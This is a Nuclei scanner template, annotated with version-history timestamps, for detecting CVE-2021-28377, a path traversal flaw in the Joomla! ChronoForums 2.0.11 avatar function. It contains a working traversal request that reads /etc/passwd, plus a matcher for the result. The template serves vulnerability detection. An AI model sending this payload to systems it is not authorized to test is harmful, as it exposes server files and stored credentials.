nuclei-templates/http/cves/2021/CVE-2021-28377.yaml

45 lines
1.8 KiB
YAML
Raw Normal View History

2022-04-01 10:02:22 +00:00
id: CVE-2021-28377
2022-04-01 10:02:22 +00:00
info:
name: Joomla! ChronoForums 2.0.11 - Local File Inclusion
2022-04-01 10:02:22 +00:00
author: 0x_Akoko
severity: medium
description: Joomla! ChronoForums 2.0.11 avatar function is vulnerable to local file inclusion through unauthenticated path traversal attacks. This enables an attacker to read arbitrary files, for example the Joomla! configuration file which contains credentials.
2023-09-27 15:51:13 +00:00
impact: |
The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing remote code execution.
2023-09-06 12:09:01 +00:00
remediation: |
Update Joomla! ChronoForums to the latest version (2.0.12) or apply the provided patch to fix the LFI vulnerability.
2022-04-01 10:02:22 +00:00
reference:
- https://herolab.usd.de/en/security-advisories/usd-2021-0007/
- https://nvd.nist.gov/vuln/detail/CVE-2021-28377
- https://github.com/ARPSyndicate/kenzer-templates
2022-04-01 10:02:22 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
2022-04-01 10:02:22 +00:00
cve-id: CVE-2021-28377
cwe-id: CWE-22
epss-score: 0.00106
epss-percentile: 0.42913
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:chronoengine:chronoforums:2.0.11:*:*:*:*:joomla:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: chronoengine
product: chronoforums
2023-09-06 12:09:01 +00:00
framework: joomla
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,chronoforums,lfi,joomla,chronoengine
2022-04-01 10:02:22 +00:00
http:
2022-04-01 10:02:22 +00:00
- method: GET
path:
- "{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
2022-04-01 10:02:22 +00:00
- type: status
status:
- 200
# digest: 4b0a00483046022100d6e6b6ae214509b16663c1be174481963518b40031b35c0ebb448735a7f82f2b022100e97e0b83c9fb1f14e13a75823cc9ebf58a93104083b1efa179e9d0045b26eec2:922c64590222798bb761d5b6d8e72950